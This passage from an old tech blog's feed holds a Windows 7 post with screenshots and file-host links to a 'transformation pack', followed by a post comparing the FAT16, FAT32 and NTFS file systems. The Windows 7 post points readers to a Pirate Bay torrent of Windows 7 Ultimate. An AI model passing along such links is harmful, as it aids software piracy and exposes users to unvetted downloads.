&lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p  style="color: rgb(204, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:130%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style=";font-family:arial;font-size:130%;color:black;"   &gt;&lt;/span&gt;&lt;span style="font-size:130%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-family: arial;"&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/SeY1c_VuuhI/AAAAAAAAAHM/ak0SJ2goI3Q/s1600-h/windows+7.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 189px;" src="http://2.bp.blogspot.com/_T53992hHLOM/SeY1c_VuuhI/AAAAAAAAAHM/ak0SJ2goI3Q/s400/windows+7.jpg" alt="" id="BLOGGER_PHOTO_ID_5325002381567375890" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;link rel="Edit-Time-Data" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_editdata.mso"&gt;&lt;!--[if !mso]&gt; &lt;style&gt; v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} &lt;/style&gt; &lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:12;"  &gt;&lt;!--[if gte vml 1]&gt;&lt;v:shapetype id="_x0000_t75" coordsize="21600,21600" spt="75" preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"&gt;  &lt;v:stroke joinstyle="miter"&gt;  &lt;v:formulas&gt;   &lt;v:f eqn="if lineDrawn pixelLineWidth 0"&gt;   &lt;v:f eqn="sum @0 1 0"&gt;   &lt;v:f eqn="sum 0 0 @1"&gt;   &lt;v:f eqn="prod @2 1 2"&gt;   &lt;v:f eqn="prod @3 21600 pixelWidth"&gt;   &lt;v:f eqn="prod @3 21600 pixelHeight"&gt;   &lt;v:f eqn="sum @0 0 1"&gt;   &lt;v:f eqn="prod @6 1 2"&gt;   &lt;v:f eqn="prod @7 21600 pixelWidth"&gt;   &lt;v:f eqn="sum @8 21600 0"&gt;   &lt;v:f eqn="prod @7 21600 pixelHeight"&gt;   &lt;v:f eqn="sum @10 21600 0"&gt;  &lt;/v:formulas&gt;  &lt;v:path extrusionok="f" gradientshapeok="t" connecttype="rect"&gt;  &lt;o:lock ext="edit" aspectratio="t"&gt; &lt;/v:shapetype&gt;&lt;v:shape id="_x0000_i1025" type="#_x0000_t75" alt="A leap in efficiency: Jump Lists provide quick access to common tasks" style="'width:300pt;height:319.5pt'"&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\arka\LOCALS~1\Temp\msohtml1\01\clip_image001.jpg" href="http://www.microsoft.com/library/media/1033/windows/images/windows-7/whats-new/screenshot_jump.jpg"&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p class="MsoNormal" style=""&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;For people not having the required configuration there is a thing called windows 7 transformation pack which makes using the currently OS feel and look like windows 7.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;The links are&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;Primary&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;&lt;a href="http://uploading.com/files/PYPZ31HZ/WindowsSe7en_Transformation_Pack.zip.html"&gt;http://uploading.com/files/PYPZ31HZ/WindowsSe7en_Transformation_Pack.zip.html&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;Mirror 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;&lt;a href="http://www.ziddu.com/download/2780598/WindowsSe7enTransformationPack.zip.html"&gt;http://www.ziddu.com/download/2780598/WindowsSe7enTransformationPack.zip.html&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;Mirror 2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;&lt;a href="http://rapidshare.com/files/167571688/WindowsSe7en_Transformation_Pack.zip"&gt;http://rapidshare.com/files/167571688/WindowsSe7en_Transformation_Pack.zip&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;span style=";font-family:arial;font-size:130%;"  &gt;&lt;span style="font-weight: bold;"&gt;Download windows 7 Ultimate from this link (you should have a torrent clint like bit torrent or u torrent for downloading this)&lt;/span&gt; &lt;/span&gt;&lt;span style="font-size:130%;"&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;http://thepiratebay.org/torrent/4835879/Windows_7_Ultimate_x64_build_7077_RC-Escrow&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Few snaps of windows 7&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SeY3vEUcLbI/AAAAAAAAAHU/eOGoDe3uBx0/s1600-h/start-menu-search-box.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 274px; height: 400px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SeY3vEUcLbI/AAAAAAAAAHU/eOGoDe3uBx0/s400/start-menu-search-box.jpg" alt="" id="BLOGGER_PHOTO_ID_5325004891165044146" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;                                                                                                                                                            &lt;span style="font-weight: bold;"&gt;SUPERBAR&lt;/span&gt;(Newer version of task bar)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SeY5wZoiobI/AAAAAAAAAHc/DGyxRIVBNvE/s1600-h/4-16-2009+1-14-38+AM.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 397px; height: 322px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SeY5wZoiobI/AAAAAAAAAHc/DGyxRIVBNvE/s400/4-16-2009+1-14-38+AM.jpg" alt="" id="BLOGGER_PHOTO_ID_5325007113089622450" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;                                                                                 &lt;span style="font-weight: bold;"&gt;IMPROVED DEVICE MANAGER&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SeY6SGZMrjI/AAAAAAAAAHk/vQ-1_sokk9c/s1600-h/Calculator_Win7_2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 355px; height: 400px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SeY6SGZMrjI/AAAAAAAAAHk/vQ-1_sokk9c/s400/Calculator_Win7_2.jpg" alt="" id="BLOGGER_PHOTO_ID_5325007692040547890" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;                                                        &lt;span style="font-weight: bold;"&gt;  ENHANCED CALCULATOR&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:Arial;"&gt;&lt;sup id="cite_ref-zdnet592_1-0"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/sup&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-3613871870430148466?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/3613871870430148466/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/windows-7.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3613871870430148466'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3613871870430148466'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/windows-7.html' title='WINDOWS 7'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/SeYx73OBV_I/AAAAAAAAAHE/y_AuB5Mzt9o/s72-c/windows-vienna.PNG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-3012224068428006973</id><published>2009-04-21T07:25:00.000-07:00</published><updated>2009-04-22T06:45:17.916-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trivia&apos;s'/><title type='text'>NTFS VS FAT</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SeCpopFfQxI/AAAAAAAAAGA/e36KQSL_vW4/s1600-h/10_0_Gb_Hard_Disk-192.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 300px; height: 300px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SeCpopFfQxI/AAAAAAAAAGA/e36KQSL_vW4/s400/10_0_Gb_Hard_Disk-192.jpg" alt="" id="BLOGGER_PHOTO_ID_5323441275240661778" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Verdana; 	panose-1:2 11 6 4 3 5 4 4 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:536871559 0 0 0 415 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;To NTFS or not to NTFS—that is the question. But unlike the deeper questions of life, this one isn't really all that hard to answer. For most users running Windows XP, NTFS is the obvious choice. It's more powerful and offers security advantages not found in the other file systems. But let's go over the differences among the files systems so we're all clear about the choice. There are essentially three different file systems available in Windows XP: FAT16, short for File Allocation Table, FAT32, and NTFS, short for NT File System. &lt;/p&gt;  &lt;p&gt;&lt;br /&gt;&lt;b&gt;FAT16&lt;/b&gt;&lt;br /&gt;The FAT16 file system was introduced way back with MS–DOS in 1981, and it's showing its age. It was designed originally to handle files on a floppy drive, and has had minor modifications over the years so it can handle hard disks, and even file names longer than the original limitation of 8.3 characters, but it's still the lowest common denominator. The biggest advantage of FAT16 is that it is compatible across a wide variety of operating systems, including Windows 95/98/Me, OS/2, Linux, and some versions of UNIX. The biggest problem of FAT16 is that it has a fixed maximum number of clusters per partition, so as hard disks get bigger and bigger, the size of each cluster has to get larger. In a 2–GB partition, each cluster is 32 kilobytes, meaning that even the smallest file on the partition will take up 32 KB of space. FAT16 also doesn't support compression, encryption, or advanced security using access control lists.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;FAT32&lt;/b&gt;&lt;br /&gt;The FAT32 file system, originally introduced in Windows 95 Service Pack 2, is really just an extension of the original FAT16 file system that provides for a much larger number of clusters per partition. As such, it greatly improves the overall disk utilization when compared to a FAT16 file system. However, FAT32 shares all of the other limitations of FAT16, and adds an important additional limitation—many operating systems that can recognize FAT16 will not work with FAT32—most notably Windows NT, but also Linux and UNIX as well. Now this isn't a problem if you're running FAT32 on a Windows XP computer and sharing your drive out to other computers on your network—they don't need to know (and generally don't really care) what your underlying file system is. &lt;/p&gt;  &lt;p&gt;&lt;b&gt;The Advantages of NTFS&lt;/b&gt;&lt;br /&gt;The NTFS file system, introduced with first version of Windows NT, is a completely different file system from FAT. It provides for greatly increased security, file–by–file compression, quotas, and even encryption. It is the default file system for new installations of Windows XP, and if you're doing an upgrade from a previous version of Windows, you'll be asked if you want to convert your existing file systems to NTFS. Don't worry. If you've already upgraded to Windows XP and didn't do the conversion then, it's not a problem. You can convert FAT16 or FAT32 volumes to NTFS at any point. Just remember that you can't easily go back to FAT or FAT32 (without reformatting the drive or partition), not that I think you'll want to.&lt;/p&gt;  &lt;p&gt;The NTFS file system is generally not compatible with other operating systems installed on the same computer, nor is it available when you've booted a computer from a floppy disk. For this reason, many system administrators, myself included, used to recommend that users format at least a small partition at the beginning of their main hard disk as FAT. This partition provided a place to store emergency recovery tools or special drivers needed for reinstallation, and was a mechanism for digging yourself out of the hole you'd just dug into. But with the enhanced recovery abilities built into Windows XP (more on that in a future column), I don't think it's necessary or desirable to create that initial FAT partition.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;When to Use FAT or FAT32&lt;/b&gt;&lt;br /&gt;If you're running more than one operating system on a single computer , you will definitely need to format some of your volumes as FAT. Any programs or data that need to be accessed by more than one operating system on that computer should be stored on a FAT16 or possibly FAT32 volume. But keep in mind that you have no security for data on a FAT16 or FAT32 volume—any one with access to the computer can read, change, or even delete any file that is stored on a FAT16 or FAT32 partition. In many cases, this is even possible over a network. So do not store sensitive files on drives or partitions formatted with FAT file systems.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-style: italic;font-size:85%;" &gt;source: (Wikipedia,Microsoft Official site). Compiled and edited by me&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="text-align: center;" align="center"&gt; &lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-3012224068428006973?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/3012224068428006973/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/ntfs-vs-fat.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' 